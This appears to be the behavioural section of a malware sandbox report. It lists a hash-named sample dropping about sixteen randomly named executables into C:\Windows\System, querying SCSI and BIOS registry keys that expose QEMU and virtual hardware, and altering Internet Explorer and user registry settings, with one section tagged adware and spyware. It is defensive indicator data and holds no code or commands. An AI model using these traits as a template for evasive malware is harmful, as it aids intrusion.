File created C:\Windows\System\UjPApAA.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\rmwJEwS.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\RlMOYRV.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ybVCTkh.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\NAuEzFT.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ybBYrfx.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\BIAzzqF.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\DPbKXZN.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\itbZaZa.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\XVXnETd.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\zWNrZxi.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\QbZNZYS.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\UmAkMvA.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\feeWNtO.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\AjNgnnP.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\DfhaxtH.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography N/A N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry N/A N/A
Key created \REGISTRY\USER\S-1-5-19 N/A N/A
Key created \REGISTRY\USER\S-1-5-19\Software N/A N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com N/A N/A
Key deleted \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "3095" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13217" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "56" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "3095" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "56" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "3047" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoftwindows.client.cbs N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "2986" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "3047" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs N/A N/A
Key deleted \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070400420061007200510065007600690072000a00410062006700200066007600740061007200710020007600610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000055979165ed97da0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000